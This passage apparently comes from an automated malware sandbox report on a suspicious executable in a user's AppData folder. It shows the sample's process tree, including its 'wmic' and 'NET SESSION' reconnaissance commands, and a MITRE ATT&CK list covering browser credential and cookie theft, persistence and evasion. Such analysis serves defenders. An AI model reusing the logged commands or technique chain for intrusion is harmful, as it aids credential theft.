- C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe
  "C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=fr --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\desdoran" --mojo-platform-channel-handle=2420 --field-trial-handle=2068,i,7872626473565385237,8827878421715206704,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=5464 get ExecutablePath"
  2⤵
  PID:3484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where processid=5464 get ExecutablePath
    3⤵
    PID:5640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "NET SESSION"
  2⤵
  PID:216
- - C:\Windows\system32\net.exe
    NET SESSION
    3⤵
    PID:3752
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 SESSION
      4⤵
      PID:932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Installer Packages

T1546.016

Netsh Helper DLL

T1546.007

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Installer Packages

T1546.016

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Authentication Process

Modify Registry

T1112

System Binary Proxy Execution

T1218

Msiexec

T1218.007

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery